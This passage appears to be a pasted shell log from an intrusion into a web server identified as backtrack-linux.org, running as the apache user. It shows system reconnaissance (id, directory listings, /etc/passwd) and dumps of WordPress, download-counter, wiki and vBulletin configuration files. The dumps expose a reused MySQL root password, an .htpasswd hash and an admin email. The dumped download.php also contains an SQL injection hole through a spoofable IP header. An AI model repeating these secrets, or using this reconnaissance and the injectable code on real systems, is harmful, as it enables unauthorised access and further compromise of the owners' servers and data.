  3540. Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
  3541.  
  3542. $ id
  3543. uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0
  3544.  
  3545. $ alias ls="ls -la"
  3546.  
  3547. $ ls
  3548. total 110
  3549. dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 .
  3550. dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 ..
  3551. -rw-r--r--.   1 root root     0 Dec  7 08:42 .autofsck
  3552. drwx------.   2 root root  4096 Dec 10 03:40 backup
  3553. dr-xr-xr-x.   2 root root  4096 Nov 29 19:59 bin
  3554. dr-xr-xr-x.   5 root root  1024 Dec  7 08:41 boot
  3555. drwxr-xr-x.  17 root root  3580 Dec  7 08:43 dev
  3556. drwxr-xr-x.  66 root root  4096 Dec  7 08:42 etc
  3557. drwxr-xr-x.   3 root root  4096 Aug 14 20:50 home
  3558. dr-xr-xr-x.   9 root root  4096 Aug 11 04:01 lib
  3559. dr-xr-xr-x.   9 root root 12288 Nov 29 20:00 lib64
  3560. drwx------.   2 root root 16384 Aug 11 02:01 lost+found
  3561. drwxr-xr-x.   2 root root  4096 Aug 11 04:42 maint
  3562. drwxr-xr-x.   2 root root  4096 Aug 25  2009 media
  3563. drwxr-xr-x.   2 root root  4096 Aug 25  2009 mnt
  3564. drwxr-xr-x.   2 root root  4096 Aug 25  2009 opt
  3565. dr-xr-xr-x. 160 root root     0 Dec  7 08:42 proc
  3566. drwxr-xr-x.   5 root root  4096 Dec  3 17:16 recovery
  3567. dr-xr-x---.   4 root root  4096 Dec 10 08:50 root
  3568. dr-xr-xr-x.   2 root root 12288 Nov 29 19:59 sbin
  3569. drwxr-xr-x.   7 root root     0 Dec  7 08:42 selinux
  3570. drwxr-xr-x.   2 root root  4096 Aug 25  2009 srv
  3571. drwxr-xr-x.  13 root root     0 Dec  7 08:42 sys
  3572. drwxrwxrwt.   4 root root  4096 Dec 10 14:08 tmp
  3573. drwxr-xr-x.  14 root root  4096 Aug 11 02:03 usr
  3574. drwxr-xr-x.  20 root root  4096 Aug 14 20:45 var
  3575.  
  3576.  
  3577. $ cat /etc/issue
  3578. Fedora release 12 (Constantine)
  3579. Kernel \r on an \m (\l)
  3580.  
  3581. $ cat /etc/passwd
  3582. root:x:0:0:root:/root:/bin/bash
  3583. bin:x:1:1:bin:/bin:/sbin/nologin
  3584. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3585. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3586. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3587. sync:x:5:0:sync:/sbin:/bin/sync
  3588. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3589. halt:x:7:0:halt:/sbin:/sbin/halt
  3590. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3591. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3592. operator:x:11:0:operator:/root:/sbin/nologin
  3593. games:x:12:100:games:/usr/games:/sbin/nologin
  3594. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3595. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3596. nobody:x:99:99:Nobody:/:/sbin/nologin
  3597. vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
  3598. dbus:x:81:81:System message bus:/:/sbin/nologin
  3599. mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
  3600. smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
  3601. sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3602. apache:x:48:494:Apache:/var/www:/sbin/nologin
  3603. mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
  3604. ossec:x:500:500::/var/ossec:/sbin/nologin
  3605. ossecm:x:501:500::/var/ossec:/sbin/nologin
  3606. ossecr:x:502:500::/var/ossec:/sbin/nologin
  3607. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3608. tcpdump:x:72:72::/:/sbin/nologin
  3609.  
  3610. $ cd
  3611. /var/www/html/
  3612.  
  3613. $ ls
  3614. total 90224
  3615. drwxr-xr-x. 13 apache apache     4096 Dec  9 12:21 .
  3616. drwxr-xr-x.  6 root   root       4096 Aug 18 10:30 ..
  3617. -rw-r--r--.  1 apache apache     4183 Dec  5 16:50 .htaccess
  3618. -rw-r--r--.  1 apache apache     1156 Aug 11 03:17 HT
  3619. -rw-r--r--.  1 apache apache     2233 Aug 11 03:17 HT-ORIG
  3620. -rw-r--r--.  1 apache apache  1526525 Nov 11 14:01 IMG_0585.JPG
  3621. drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 ads
  3622. -rw-r--r--.  1 apache apache   125832 Nov 19 12:18 bootsplash.jpg
  3623. -rw-r--r--.  1 apache apache   754444 Aug 11 03:16 bt-nsa.png
  3624. -rw-r--r--.  1 apache apache   757498 Aug 11 03:16 bt-nsa2.png
  3625. -rw-r--r--.  1 apache apache    81597 Aug 11 03:16 bt4-final-vm.zip.torrent
  3626. -rw-r--r--.  1 apache apache    60094 Aug 11 03:16 bt4-final.iso.torrent
  3627. -rw-r--r--.  1 apache apache       44 Aug 11 03:16 bt4r1.txt
  3628. -rw-r--r--.  1 root   root     686248 Nov 23 10:47 bt4r2.png
  3629. -rw-r--r--.  1 apache apache   160728 Aug 11 03:16 btfail.png
  3630. -rw-r--r--.  1 apache apache      476 Aug 11 03:16 collapsible_ad.html
  3631. -rwxr-xr-x.  1 apache apache 13397784 Aug 11 03:16 d.bin
  3632. -rw-r--r--.  1 apache apache      121 Aug 11 03:16 d.lic
  3633. -rw-r--r--.  1 apache apache 12844822 Aug 11 03:16 d32.bin
  3634. drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 documents
  3635. -rw-r--r--.  1 apache apache     3342 Aug 11 03:16 down.php
  3636. -rw-r--r--.  1 apache apache     4158 Aug 11 03:16 download-orig.php
  3637. -rw-r--r--.  1 apache apache     4945 Nov 22 11:38 download.php
  3638. -rw-r--r--.  1 apache apache    15125 Aug 11 03:16 error.php
  3639. -rw-r--r--.  1 apache apache   137383 Aug 11 03:16 example-2.jpg
  3640. -rw-r--r--.  1 apache apache     1150 Aug 11 03:16 favicon.ico
  3641. drwxr-xr-x. 21 apache apache     4096 Nov 22 18:56 forums
  3642. -rw-r--r--.  1 apache apache    87176 Aug 11 03:17 google.png
  3643. -rw-r--r--.  1 apache apache       53 Aug 11 03:17 googled6c4817aa45e0032.html
  3644. -rw-r--r--.  1 apache apache       23 Aug 11 03:17 googlehostedservice.html
  3645. -rw-r--r--.  1 apache apache  1978856 Sep 17 08:06 hola.jpg
  3646. -rw-r--r--.  1 apache apache  2264271 Sep 17 08:12 hola1.jpg
  3647. -rw-r--r--.  1 apache apache  2197361 Sep 17 08:15 hola2.jpg
  3648. -rw-r--r--.  1 apache apache   315306 Aug 11 03:17 hola22.png
  3649. -rw-r--r--.  1 apache apache   169202 Aug 11 03:17 hola23.png
  3650. drwxr-xr-x.  8 apache apache     4096 Nov 21 16:38 images
  3651. -rw-r--r--.  1 apache apache        3 Aug 11 03:17 index.html
  3652. -rw-r--r--.  1 apache apache      397 Dec  9 12:20 index.php
  3653. -rw-r--r--.  1 apache apache   321196 Nov 19 15:06 kanji.png
  3654. -rw-r--r--.  1 apache apache   147841 Sep  4 12:37 knock-0.5.tar.gz
  3655. -rw-r--r--.  1 apache apache    15410 Dec  9 12:20 license.txt
  3656. -rw-r--r--.  1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
  3657. -rw-r--r--.  1 apache apache    13946 Aug 11 03:17 nv-xorg.conf
  3658. -rw-r--r--.  1 apache apache  1382400 Oct 26 10:38 oiopub-direct.tar
  3659. -rw-r--r--.  1 apache apache  1508471 Aug 11 03:17 p2270016.jpg
  3660. -rw-r--r--.  1 apache apache  1636957 Aug 11 03:17 p2280018.jpg
  3661. drwxr-xr-x.  2 apache apache     4096 Nov 22 11:46 patches
  3662. -rw-r--r--.  1 apache apache      582 Nov 22 11:21 r2.php
  3663. -rw-r--r--.  1 apache apache     9120 Dec  9 12:20 readme.html
  3664. -rw-r--r--.  1 apache apache      712 Nov 10 22:27 s.php
  3665. -rw-r--r--.  1 apache apache       63 Aug 11 03:17 show.dud.php
  3666. -rw-r--r--.  1 apache apache      801 Aug 11 03:17 show.original.php
  3667. -rw-r--r--.  1 apache apache       31 Aug 11 03:17 show.php
  3668. -rw-r--r--.  1 apache apache      601 Nov 10 22:28 show.stats.working.php
  3669. -rw-r--r--.  1 apache apache    38971 Dec  7 23:23 sitemap.xml
  3670. -rw-r--r--.  1 apache apache     2485 Dec  7 23:23 sitemap.xml.gz
  3671. drwxr-xr-x.  3 apache apache     4096 Aug 11 03:17 slider
  3672. -rw-r--r--.  1 apache apache   714372 Aug 11 03:17 spot-the-release.png
  3673. -rw-r--r--.  1 apache apache     1536 Aug 11 03:17 stats.php
  3674. -rw-r--r--.  1 apache apache       33 Dec 10 03:34 stats.txt
  3675. -rw-r--r--.  1 apache apache    23660 Aug 11 03:17 style.css
  3676. -rw-r--r--.  1 apache apache        5 Aug 11 03:17 test.php
  3677. drwxr-xr-x.  2 apache apache     4096 Nov 22 09:22 torrents
  3678. drwxr-xr-x. 15 apache apache     4096 Nov 27 16:52 wiki
  3679. -rw-r--r--.  1 apache apache     4391 Dec  9 12:20 wp-activate.php
  3680. drwxr-xr-x.  8 apache apache     4096 Dec  5 08:12 wp-admin
  3681. -rw-r--r--.  1 apache apache    40284 Dec  9 12:20 wp-app.php
  3682. -rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-atom.php
  3683. -rw-r--r--.  1 apache apache      274 Dec  9 12:20 wp-blog-header.php
  3684. -rw-r--r--.  1 apache apache     3926 Dec  9 12:20 wp-comments-post.php
  3685. -rw-r--r--.  1 apache apache      238 Dec  9 12:20 wp-commentsrss2.php
  3686. -rw-r--r--.  1 apache apache     3173 Dec  9 12:20 wp-config-sample.php
  3687. -rw-r--r--.  1 apache apache     2696 Nov 22 19:32 wp-config.php
  3688. drwxr-xr-x.  9 apache apache     4096 Dec  9 12:21 wp-content
  3689. -rw-r--r--.  1 apache apache     1255 Dec  9 12:20 wp-cron.php
  3690. -rw-r--r--.  1 apache apache      240 Dec  9 12:20 wp-feed.php
  3691. drwxr-xr-x.  8 apache apache     4096 Aug 13 20:06 wp-includes
  3692. -rw-r--r--.  1 apache apache     2002 Dec  9 12:20 wp-links-opml.php
  3693. -rw-r--r--.  1 apache apache     2441 Dec  9 12:20 wp-load.php
  3694. -rw-r--r--.  1 apache apache    26059 Dec  9 12:20 wp-login.php
  3695. -rw-r--r--.  1 apache apache     7774 Dec  9 12:20 wp-mail.php
  3696. -rw-r--r--.  1 apache apache      487 Dec  9 12:20 wp-pass.php
  3697. -rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rdf.php
  3698. -rw-r--r--.  1 apache apache      316 Dec  9 12:20 wp-register.php
  3699. -rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rss.php
  3700. -rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-rss2.php
  3701. -rw-r--r--.  1 apache apache     9177 Dec  9 12:20 wp-settings.php
  3702. -rw-r--r--.  1 apache apache    18695 Dec  9 12:20 wp-signup.php
  3703. -rw-r--r--.  1 apache apache     3702 Dec  9 12:20 wp-trackback.php
  3704. -rw-r--r--.  1 root   root      99665 Nov 24 00:52 wtfff.png
  3705. -rw-r--r--.  1 apache apache       85 Nov 20 13:43 x.gif
  3706. -rw-r--r--.  1 apache apache    95481 Dec  9 12:20 xmlrpc.php
  3707.  
  3708. $ cat wp-config.php
  3709. <?php
  3710. /** Enable W3 Total Cache **/
  3711. define('WP_CACHE', true); // Added by W3 Total Cache
  3712.  
  3713. /**
  3714.  * The base configurations of the WordPress.
  3715.  *
  3716.  * This file has the following configurations: MySQL settings, Table Prefix,
  3717.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
  3718.  * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  3719.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  3720.  *
  3721.  * This file is used by the wp-config.php creation script during the
  3722.  * installation. You don't have to use the web site, you can just copy this file
  3723.  * to "wp-config.php" and fill in the values.
  3724.  *
  3725.  * @package WordPress
  3726.  */
  3727.  
  3728. // ** MySQL settings - You can get this info from your web host ** //
  3729. /** The name of the database for WordPress */
  3730. define('DB_NAME', 'blog');
  3731.  
  3732. /** MySQL database username */
  3733. define('DB_USER', 'root');
  3734.  
  3735. /** MySQL database password */
  3736. define('DB_PASSWORD', '234hi2u3d98as7d23kuh');
  3737.  
  3738. /** MySQL hostname */
  3739. define('DB_HOST', 'localhost');
  3740.  
  3741. /** Database Charset to use in creating database tables. */
  3742. define('DB_CHARSET', 'utf8');
  3743.  
  3744. /** The Database Collate type. Don't change this if in doubt. */
  3745. define('DB_COLLATE', '');
  3746.  
  3747. /**#@+
  3748.  * Authentication Unique Keys.
  3749.  *
  3750.  * Change these to different unique phrases!
  3751.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
  3752.  * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  3753.  *
  3754.  * @since 2.6.0
  3755.  */
  3756. define('AUTH_KEY', 'put your unique phrase here');
  3757. define('SECURE_AUTH_KEY', 'put your unique phrase here');
  3758. define('LOGGED_IN_KEY', 'put your unique phrase here');
  3759. define('NONCE_KEY', 'put your unique phrase here');
  3760. /**#@-*/
  3761.  
  3762. /**
  3763.  * WordPress Database Table prefix.
  3764.  *
  3765.  * You can have multiple installations in one database if you give each a unique
  3766.  * prefix. Only numbers, letters, and underscores please!
  3767.  */
  3768. $table_prefix  = 'wp_';
  3769.  
  3770. /**
  3771.  * WordPress Localized Language, defaults to English.
  3772.  *
  3773.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  3774.  * language must be installed to wp-content/languages. For example, install
  3775.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  3776.  * language support.
  3777.  */
  3778. define ('WPLANG', '');
  3779.  
  3780. /* That's all, stop editing! Happy blogging. */
  3781.  
  3782. /** WordPress absolute path to the Wordpress directory. */
  3783. if ( !defined('ABSPATH') )
  3784.         define('ABSPATH', dirname(__FILE__) . '/');
  3785.  
  3786. /** Sets up WordPress vars and included files. */
  3787. require_once(ABSPATH . 'wp-settings.php');
  3788.  
  3789. $ cat show.php
  3790. <?php
  3791. include 'stats.txt';
  3792. ?>
  3793. $ cat stats.txt
  3794. BackTrack 4 - 4916323 downloads
  3795.  
  3796. cat download.php
  3797. <?php
  3798.  
  3799. // DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!
  3800.  
  3801. function getRealIpAddr()
  3802. {
  3803.     if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
  3804.     {
  3805.       $ip=$_SERVER['HTTP_CLIENT_IP'];
  3806.     }
  3807.     elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
  3808.     {
  3809.       $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
  3810.     }
  3811.     else
  3812.     {
  3813.       $ip=$_SERVER['REMOTE_ADDR'];
  3814.     }
  3815.     return $ip;
  3816. }
  3817.  
  3818. $ip=getRealIpAddr();
  3819.  
  3820. $username="root";
  3821. $password="234hi2u3d98as7d23kuh";
  3822. $database="counter";
  3823.  
  3824. function choose($iso)
  3825. {
  3826.  
  3827.  $num = Rand (1,5);
  3828.  switch ($num)
  3829.  {
  3830.   case 1:
  3831.   $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
  3832.   break;
  3833.  
  3834.   case 2:
  3835.   $link="http://ftp.uio.no/pub/security/backtrack/$iso";
  3836.   break;
  3837.  
  3838.   case 3:
  3839.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3840.                 break;
  3841.  
  3842.   case 4:
  3843.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3844.                 break;
  3845.  
  3846.   case 5:
  3847.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3848.                 break;
  3849.  
  3850. //  case 6:
  3851. //  $link="http://moon.backtrack-linux.org/downloads/$iso";
  3852. //  break;
  3853.  
  3854.  
  3855.  }
  3856.  
  3857.  
  3858. return $link;
  3859.  
  3860. }
  3861.  
  3862.  
  3863. $version=$_GET["fname"];
  3864.  
  3865. if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))
  3866.  
  3867. {
  3868.  echo "This page cannot be accessed directly.";
  3869.  exit;
  3870. }
  3871.  
  3872. if ($version=="bt4r2")
  3873. {
  3874.  
  3875.         $iso="bt4-r2.iso";
  3876.         $link=choose($iso);
  3877.  
  3878. mysql_connect("localhost",$username,$password);
  3879. @mysql_select_db($database) or die( "Unable to select database");
  3880. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3881. mysql_query($query);
  3882. mysql_close();
  3883.  
  3884.         header( "Location: $link ");
  3885.         exit;
  3886. }
  3887.  
  3888.  
  3889. if ($version=="bt4r2vm")
  3890. {
  3891.  
  3892.         $iso="bt4-r2-vm.tar.bz2";
  3893.         $link=choose($iso);
  3894.  
  3895. mysql_connect("localhost",$username,$password);
  3896. @mysql_select_db($database) or die( "Unable to select database");
  3897. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3898. mysql_query($query);
  3899. mysql_close();
  3900.  
  3901.         header( "Location: $link ");
  3902.         exit;
  3903. }
  3904.  
  3905.  
  3906.  
  3907. if ($version=="bt4f")
  3908. {
  3909.  
  3910.  $iso="bt4-final.iso";
  3911.  $link=choose($iso);
  3912.  
  3913. mysql_connect("localhost",$username,$password);
  3914. @mysql_select_db($database) or die( "Unable to select database");
  3915. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3916. mysql_query($query);
  3917. mysql_close();
  3918.  
  3919.  header( "Location: $link ");
  3920.  exit;
  3921. }
  3922.  
  3923. elseif ($version=="bt4fvm")
  3924. {
  3925.  $iso="bt4-final-vm.zip";
  3926.  $link=choose($iso);
  3927.  
  3928. mysql_connect("localhost",$username,$password);
  3929. @mysql_select_db($database) or die( "Unable to select database");
  3930. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3931. mysql_query($query);
  3932. mysql_close();
  3933.  
  3934.  header( "Location: $link ");
  3935.  exit;
  3936. }
  3937.  
  3938. elseif ($version=="bt4r1")
  3939. {
  3940.  $iso="bt4-r1.iso";
  3941.  $link=choose($iso);
  3942.  
  3943. mysql_connect("localhost",$username,$password);
  3944. @mysql_select_db($database) or die( "Unable to select database");
  3945. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3946. mysql_query($query);
  3947. mysql_close();
  3948.  
  3949.  header( "Location: $link ");
  3950.  exit;
  3951. }
  3952.  
  3953. elseif ($version=="bt4r1vm")
  3954. {
  3955.  $iso="bt4-r1-vm.tar.bz2";
  3956.  $link=choose($iso);
  3957.  
  3958. mysql_connect("localhost",$username,$password);
  3959. @mysql_select_db($database) or die( "Unable to select database");
  3960. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3961. mysql_query($query);
  3962. mysql_close();
  3963.  
  3964.  header( "Location: $link ");
  3965.  exit;
  3966. }
  3967.  
  3968. elseif ($version=="bt4pf")
  3969. {
  3970.  $iso="bt4-pre-final.iso";
  3971.  $link=choose($iso);
  3972.  
  3973. mysql_connect("localhost",$username,$password);
  3974. @mysql_select_db($database) or die( "Unable to select database");
  3975. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3976. mysql_query($query);
  3977. mysql_close();
  3978.  
  3979.  header( "Location: $link ");
  3980.  exit;
  3981. }
  3982.  
  3983. elseif ($version=="bt4b")
  3984. {
  3985.  $iso="bt4-beta.iso";
  3986.  $link=choose($iso);
  3987. mysql_connect("localhost",$username,$password);
  3988. @mysql_select_db($database) or die( "Unable to select database");
  3989. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3990. mysql_query($query);
  3991. mysql_close();
  3992.  header( "Location: $link ");
  3993.  exit;
  3994. }
  3995.  
  3996. elseif ($version=="bt4bvm")
  3997. {
  3998.  $iso="bt4-beta-vm-6.5.1.rar";
  3999.  $link=choose($iso);
  4000. mysql_connect("localhost",$username,$password);
  4001. @mysql_select_db($database) or die( "Unable to select database");
  4002. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  4003. mysql_query($query);
  4004. mysql_close();
  4005.  header( "Location: $link ");
  4006.  exit;
  4007. }
  4008.  
  4009. elseif ($version=="bt3")
  4010. {
  4011.  $iso="bt3-final.iso";
  4012.  $link=choose($iso);
  4013. mysql_connect("localhost",$username,$password);
  4014. @mysql_select_db($database) or die( "Unable to select database");
  4015. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  4016. mysql_query($query);
  4017. mysql_close();
  4018.  header( "Location: $link ");
  4019.  exit;
  4020. }
  4021.  
  4022. else
  4023. {
  4024.  exit;
  4025. }
  4026.  
  4027. ?>
  4028.  
  4029.  
  4030. $ cat s.php
  4031. <?php
  4032.  
  4033.  
  4034. $username="root";
  4035. $password="234hi2u3d98as7d23kuh";
  4036. $database="counter";
  4037.  
  4038.  
  4039.  
  4040. mysql_connect("localhost",$username,$password);
  4041. @mysql_select_db($database) or die( "Unable to select database");
  4042. $query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
  4043. $query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
  4044. $result=mysql_query($query);
  4045. $result2=mysql_query($query2);
  4046. $row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
  4047. $row = mysql_fetch_array($result, MYSQL_ASSOC);
  4048. $numrows1 = $row['numrows'];
  4049. $numrows2 = $row2['numrows'];
  4050. mysql_close();
  4051.  
  4052. $total= round(($numrows1 + $numrows2) * 1.4);
  4053.  
  4054. echo "BackTrack 4 Final - $total unique downloads";
  4055.  
  4056. ?>
  4057.  
  4058. $ cd wiki
  4059.  
  4060. $ ls
  4061.  
  4062. total 700
  4063. drwxr-xr-x. 15 apache apache   4096 Nov 27 16:52 .
  4064. drwxr-xr-x. 13 apache apache   4096 Dec  9 12:21 ..
  4065. -rw-r--r--.  1 apache apache     23 Nov 14 16:01 .htpasswd
  4066. -rw-r--r--.  1 apache apache  17997 Apr  5  2006 COPYING
  4067. -rw-r--r--.  1 apache apache   2073 Jul 27 07:29 CREDITS
  4068. -rw-r--r--.  1 apache apache     76 Jul 27  2009 FAQ
  4069. -rw-r--r--.  1 apache apache 392287 Mar 12  2010 HISTORY
  4070. -rw-r--r--.  1 apache apache     96 Nov 14 16:01 HT
  4071. -rw-r--r--.  1 apache apache   4138 Apr 18  2008 INSTALL
  4072. -rw-r--r--.  1 apache apache   5469 Nov 28 16:45 LocalSettings.php
  4073. -rw-r--r--.  1 apache apache   3649 Nov 11  2008 README
  4074. -rw-r--r--.  1 apache apache  58431 Jul 28 03:11 RELEASE-NOTES
  4075. -rw-r--r--.  1 apache apache    648 May  7  2009 StartProfiler.sample
  4076. -rw-r--r--.  1 apache apache  13307 Mar 25  2010 UPGRADE
  4077. drwxr-xr-x.  2 root   root     4096 Nov 27 16:53 adsense
  4078. -rw-r--r--.  1 apache apache   4707 Feb 15  2010 api.php
  4079. -rw-r--r--.  1 apache apache     25 Feb  3  2008 api.php5
  4080. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 bin
  4081. -rw-r--r--.  1 apache apache   8436 Nov 21 14:24 bt-wiki.png
  4082. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 cache
  4083. drwxr-xr-x.  2 apache apache   4096 Nov 14 15:58 config
  4084. drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 docs
  4085. drwxr-xr-x.  4 apache apache   4096 Nov 28 16:44 extensions
  4086. drwxr-xr-x. 12 apache apache   4096 Nov 23 12:36 images
  4087. -rw-r--r--.  1 apache apache   4031 Oct 14  2009 img_auth.php
  4088. -rw-r--r--.  1 apache apache     31 Feb  3  2008 img_auth.php5
  4089. drwxr-xr-x. 16 apache apache   4096 Jul 28 03:16 includes
  4090. -rw-r--r--.  1 apache apache   4329 Jan  1  2010 index.php
  4091. -rw-r--r--.  1 apache apache     28 Feb  3  2008 index.php5
  4092. drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 languages
  4093. drwxr-xr-x. 13 apache apache  12288 Nov 22 12:55 maintenance
  4094. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 math
  4095. -rw-r--r--.  1 apache apache   3054 Mar 21  2009 opensearch_desc.php
  4096. -rw-r--r--.  1 apache apache     39 Mar  3  2008 opensearch_desc.php5
  4097. -rw-r--r--.  1 apache apache    174 Feb  3  2010 php5.php5
  4098. -rw-r--r--.  1 apache apache   8821 Jul 27 03:40 profileinfo.php
  4099. -rw-r--r--.  1 apache apache    383 Mar 21  2009 redirect.php
  4100. -rw-r--r--.  1 apache apache     31 Feb  3  2008 redirect.php5
  4101. -rw-r--r--.  1 apache apache     89 Feb  3  2010 redirect.phtml
  4102. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 serialized
  4103. -rwxrwxrwx.  1 root   root     6816 Nov 23 18:29 sitemap.xml
  4104. drwxr-xr-x.  9 apache apache   4096 Nov 28 14:12 skins
  4105. -rw-r--r--.  1 apache apache   4905 Mar  8  2010 thumb.php
  4106. -rw-r--r--.  1 apache apache     29 Feb  3  2008 thumb.php5
  4107. -rw-r--r--.  1 apache apache   1347 Nov  5  2008 trackback.php
  4108. -rw-r--r--.  1 apache apache     32 Mar 16  2009 trackback.php5
  4109. -rw-r--r--.  1 apache apache     86 Feb  3  2010 wiki.phtml
  4110.  
  4111. $ cat .htpasswd
  4112. edbadmin:YE8mle4nG1Z.c
  4113.  
  4114. cd ..
  4115. cat forums/includes/config.php
  4116. <?php
  4117. /*======================================================================*\
  4118. || #################################################################### ||
  4119. || # vBulletin 4.0.0 Patch Level 1
  4120. || # ---------------------------------------------------------------- # ||
  4121. || # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
  4122. || # This file may not be redistributed in whole or significant part. # ||
  4123. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  4124. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  4125. || #################################################################### ||
  4126. \*======================================================================*/
  4127.  
  4128. /*-------------------------------------------------------*\
  4129. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  4130. +---------------------------------------------------------+
  4131. | If you get any errors while attempting to connect to    |
  4132. | MySQL, you will need to email your webhost because we   |
  4133. | cannot tell you the correct values for the variables    |
  4134. | in this file.                                           |
  4135. \*-------------------------------------------------------*/
  4136.  
  4137.  // ****** DATABASE TYPE ******
  4138.  // This is the type of the database server on which your vBulletin database will be located.
  4139.  // Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  4140.  // for slave options just append _slave to your preferred database type.
  4141. $config['Database']['dbtype'] = 'mysql';
  4142.  
  4143.  // ****** DATABASE NAME ******
  4144.  // This is the name of the database where your vBulletin will be located.
  4145.  // This must be created by your webhost.
  4146. $config['Database']['dbname'] = 'forums';
  4147.  
  4148.  // ****** TABLE PREFIX ******
  4149.  // Prefix that your vBulletin tables have in the database.
  4150. $config['Database']['tableprefix'] = '';
  4151.  
  4152.  // ****** TECHNICAL EMAIL ADDRESS ******
  4153.  // If any database errors occur, they will be emailed to the address specified here.
  4154.  // Leave this blank to not send any emails when there is a database error.
  4155. $config['Database']['technicalemail'] = 'muts@offsec.com';
  4156.  
  4157.  // ****** FORCE EMPTY SQL MODE ******
  4158.  // New versions of MySQL (4.1+) have introduced some behaviors that are
  4159.  // incompatible with vBulletin. Setting this value to "true" disables those
  4160.  // behaviors. You only need to modify this value if vBulletin recommends it.
  4161. $config['Database']['force_sql_mode'] = false;
  4162.  
  4163.  
  4164.  
  4165.  // ****** MASTER DATABASE SERVER NAME AND PORT ******
  4166.  // This is the hostname or IP address and port of the database server.
  4167.  // If you are unsure of what to put here, leave the default values.
  4168. $config['MasterServer']['servername'] = 'localhost';
  4169. $config['MasterServer']['port'] = 3306;
  4170.  
  4171.  // ****** MASTER DATABASE USERNAME & PASSWORD ******
  4172.  // This is the username and password you use to access MySQL.
  4173.  // These must be obtained through your webhost.
  4174. $config['MasterServer']['username'] = 'root';
  4175. $config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';
  4176.  
  4177.  // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  4178.  // This option allows you to turn persistent connections to MySQL on or off.
  4179.  // The difference in performance is negligible for all but the largest boards.
  4180.  // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  4181. $config['MasterServer']['usepconnect'] = 0;
  4182.  
  4183.  
  4184.  
  4185.  // ****** SLAVE DATABASE CONFIGURATION ******
  4186.  // If you have multiple database backends, this is the information for your slave
  4187.  // server. If you are not 100% sure you need to fill in this information,
  4188.  // do not change any of the values here.
  4189. $config['SlaveServer']['servername'] = '';
  4190. $config['SlaveServer']['port'] = 3306;
  4191. $config['SlaveServer']['username'] = '';
